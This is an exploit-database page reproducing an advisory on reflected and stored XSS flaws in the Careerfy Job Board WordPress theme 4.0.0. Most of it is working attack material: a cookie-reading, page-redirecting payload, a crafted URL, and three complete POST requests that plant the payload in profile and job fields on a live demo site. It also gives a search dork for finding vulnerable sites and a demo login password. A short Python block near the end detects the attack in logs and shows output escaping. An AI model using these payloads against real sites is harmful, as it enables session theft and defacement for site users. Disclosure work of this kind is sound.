Careerfy - Job Board WordPress Theme v4.0.0 - Multiple Vulnerabilities

CVE: CVE-2020-5815
Category: CWE-79
Price: $500
Severity: High
Author: Exploit Alert Team
Risk: High
Exploitation Type: Remote
Date: 2020-07-18
CPE: cpe:cpe:/a:careerfy:job_board_wordpress_theme:4.0.0
CVSS: CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS: 0.02192
EPSSP: 0.50148


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070091

Below is a copy:

Careerfy - Job Board WordPress Theme v4.0.0 - Multiple Vulnerabilities
[+] Exploit Title: Careerfy - Job Board WordPress Theme v4.0.0 - Multiple Vulnerabilities
[+] Google Dork: inurl:/wp-content/themes/careerfy/
[+] Date: 2020-07-05
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Eyecix [ http://eyecix.com ]
[+] Software Version: 4.0.0
[+] Software Link: https://themeforest.net/item/careerfy-job-board-wordpress-theme/21137053
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] One unauthenticated reflected XSS and multiple authenticated persistent XSS vulnerabilities were discovered in the Careerfy Job Board theme v4.0.0 for WordPress.

[i] The authenticated persistent XSS on the Job Page triggers in the dashboard area /user-dashboard/?tab=manage-jobs and on the job page itself.

[i] Demo account #1 (Candidate @ Careerfy PetCare): vladvector / DJKNFU#$&H#IUFD (login / password)

[i] Demo account #2 (Employer @ Careerfy Job Board): vladvector / DJKNFU#$&H#IUFD (login / password)

[i] Candidate @ PetCare profile URL: https://careerfy.net/petcare/candidate/vladvector/

[i] Employer @ Job Board profile URL: https://careerfy.net/careerbooster/employer/vladvector/

[i] Employer @ Job Board job URL: https://careerfy.net/careerbooster/job/poc-2/



### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS -> /?sector_cat=[payload]

[x] Authenticated Persistent XSS -> Candidate Profile (vulnerable field: Full Address)

[x] Authenticated Persistent XSS -> Employer Profile (vulnerable fields: Dial Code, Full Address)

[x] Authenticated Persistent XSS -> Job Page (vulnerable field: Full Address)



### [ Payload: ]

[$] 1"--><!--<img src="-->"><img src=x onerror=alert(`VL?DV?CTOR`);alert(document.cookie);window.location=`https://themeforest.net/user/vladvector`;>



### [ PoC Unauthenticated Reflected XSS: ]

[!] https://careerfy.net/careerbooster/jobs-listing/?sector_cat=1%22--%3E%3C!--%3Cimg%20src=%22--%3E%22%3E%3Cimg%20src=x%20onerror=alert(`VL?DV?CTOR`);alert(document.cookie);window.location=`https://themeforest.net/user/vladvector`;%3E

[!] GET /careerbooster/jobs-listing/?sector_cat=1%22--%3E%3C!--%3Cimg%20src=%22--%3E%22%3E%3Cimg%20src=x%20onerror=alert(`VL?DV?CTOR`);alert(document.cookie);window.location=`https://themeforest.net/user/vladvector`;%3E HTTP/1.1
Host: careerfy.net



### [ PoC Authenticated Persistent XSS -> Candidate User Profile: ]

[!] POST /petcare/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: careerfy.net
Content-Type: multipart/form-data; boundary=---------------------------42351733583489166030977870308
Content-Length: 4754
Origin: https://careerfy.net
Referer: https://careerfy.net/petcare/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="user_cvr_photo_cand"; filename=""
Content-Type: application/octet-stream


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_user_dob_whole"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="user_phone"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="dial_code"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="user_sector"

39
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_candidate_jobtitle"

Vlad Vector
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="candidate_salary_type"

type_1
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="candidate_salary"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="candidate_salary_currency"

default
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="candidate_salary_pos"

left
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="candidate_salary_sep"

,
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="candidate_salary_deci"

2
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="user_bio"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="academic-level"

masters-degree
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="Age"

23` -- 27-years
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="salary"

31337
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="gender"

male1
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="industry"

hack' -- ing
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="cand_user_facebook_url"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="cand_user_twitter_url"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="cand_user_linkedin_url"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="cand_user_dribbble_url"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_location_address"

1"--><!--<img src="-->"><img src=x onerror=alert(`VL?DV?CTOR`);alert(document.cookie);window.location=`https://themeforest.net/user/vladvector`;>
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_location_lat"

37.090240
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_location_lng"

-95.712891
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

12
-----------------------------42351733583489166030977870308
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------42351733583489166030977870308--



### [ PoC Authenticated Persistent XSS -> Employer Profile: ]

[!] POST /careerbooster/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: careerfy.net
Content-Type: multipart/form-data; boundary=---------------------------22074218576675900842109481301
Content-Length: 5617
Origin: https://careerfy.net
Referer: https://careerfy.net/careerbooster/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_cvr_photo"; filename=""
Content-Type: application/octet-stream


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="display_name"

Vlad Vector
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_phone"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="dial_code"

1"--><!--<img src="-->"><img src=x onerror=alert(`VL?DV?CTOR`);alert(document.cookie);window.location=`https://themeforest.net/user/vladvector`;>
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_website"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_sector"

34
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_dob_mm"

7
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_dob_dd"

5
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_dob_yy"

2020
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_bio"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="founded-since"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="emp_user_facebook_url"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="emp_user_twitter_url"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="emp_user_linkedin_url"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="emp_user_dribbble_url"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_location_address"

1"--><!--<img src="-->"><img src=x onerror=alert(`VL?DV?CTOR`);alert(document.cookie);window.location=`https://themeforest.net/user/vladvector`;>
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_location_lat"

37.090240
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_location_lng"

-95.712891
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_location_zoom"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_team_title[]"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_team_designation[]"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_team_experience[]"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_team_image[]"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_team_facebook[]"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_team_google[]"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_team_twitter[]"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_team_linkedin[]"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="jobsearch_field_team_description[]"


-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------22074218576675900842109481301
Content-Disposition: form-data; name="terms_cond_check"

on
-----------------------------22074218576675900842109481301--



### [ PoC Authenticated Persistent XSS -> Job Page: ]

[!] POST /careerbooster/user-dashboard/?tab=user-job HTTP/1.1
Host: careerfy.net
Content-Type: multipart/form-data; boundary=---------------------------2947472569940564910711066421
Content-Length: 4254
Origin: https://careerfy.net
Referer: https://careerfy.net/careerbooster/user-dashboard/?tab=user-job
Cookie: [cookies_here]

-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_title"

PoC
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_detail"

PoC
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="application_deadline"

15-07-2020 19:04:42
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_sector"

34
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_type"

20
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="get_job_skills[]"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_apply_type"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_apply_url"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_apply_email"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_salary_type"

type_1
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_salary"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_max_salary"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_salary_currency"

default
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_salary_pos"

left
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_salary_sep"

,
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_salary_deci"

2
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="offered-salary"

31337
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="career-level"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="experience"

2-years
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="gender"

male
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="Industry"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="qualifications"

hacking\ 'skills
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="job_attach_files[]"; filename=""
Content-Type: application/octet-stream


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="jobsearch_field_location_address"

1"--><!--<img src="--><img src=x onerror=(alert)(document.cookie)//">1 "><svg/onload=';alert(`VL?DV?CTOR`);window.location=`https://twitter.com/vlad_vector`;'>
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="jobsearch_field_location_lat"

37.090240
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="jobsearch_field_location_lng"

-95.712891
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

12
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="user_job_posting"

1
-----------------------------2947472569940564910711066421
Content-Disposition: form-data; name="terms_cond_check"

on
-----------------------------2947472569940564910711066421--
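The reflected PoC (the sector_cat parameter) and the stored PoCs (the Full Address and Dial Code fields) above share one root cause: user input echoed into HTML without output escaping. The Python below is an added defensive example, not code from the advisory or from the theme: it flags sector_cat values carrying markup in constructed access-log lines, and renders the stored address unescaped beside the escaped form to show why the payload goes inert. The log lines, client IPs and the two render functions are assumptions made for illustration.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format). The first
# carries the advisory's reflected payload, percent-encoded as in the PoC
# (alert body shortened); the other two are ordinary traffic.
SAMPLE_LOG = r'''203.0.113.7 - - [18/Jul/2020:10:01:02 +0000] "GET /careerbooster/jobs-listing/?sector_cat=1%22--%3E%3C!--%3Cimg%20src=%22--%3E%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.8 - - [18/Jul/2020:10:01:05 +0000] "GET /careerbooster/jobs-listing/?sector_cat=34 HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
203.0.113.9 - - [18/Jul/2020:10:01:09 +0000] "GET /careerbooster/job/poc-2/ HTTP/1.1" 200 3311 "-" "Mozilla/5.0"
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+"')
# Markup characters and on*= handler names never belong in a sector id,
# which the theme expects to be numeric; the advisory's payload uses all of them.
SUSPICIOUS = re.compile(r'[<>"\']|\bon\w+\s*=', re.IGNORECASE)

def flag_sector_cat_attempts(log_text):
    """Return (client ip, decoded sector_cat value) for every request whose
    sector_cat parameter contains markup. parse_qs percent-decodes the value
    first, so %3C/%22 encodings cannot hide the characters from the check."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group('target')).query
        for value in parse_qs(query, keep_blank_values=True).get('sector_cat', []):
            if SUSPICIOUS.search(value):
                hits.append((m.group('ip'), value))
    return hits

def render_address_unsafe(address):
    """Mirrors the vulnerable pattern (assumed, not the theme's code): the
    stored Full Address is echoed straight into an attribute value, so a
    double quote closes the attribute and the rest becomes live markup."""
    return '<input type="text" value="%s">' % address

def render_address_escaped(address):
    """The fix: escape on output. html.escape with quote=True converts
    < > & " and ' to entities, the same contract as WordPress esc_attr()."""
    return '<input type="text" value="%s">' % html.escape(address, quote=True)

if __name__ == '__main__':
    for ip, value in flag_sector_cat_attempts(SAMPLE_LOG):
        print('reflected XSS attempt from %s: %s' % (ip, value))
    poc = '1"--><!--<img src="-->"><img src=x onerror=alert(1)>'
    print(render_address_unsafe(poc))
    print(render_address_escaped(poc))
```

The same esc_attr()-style escaping applied to the reflected sector_cat value before it is written into the listing page closes the unauthenticated case as well.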



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector

Copyright ©2024 Exploitalert.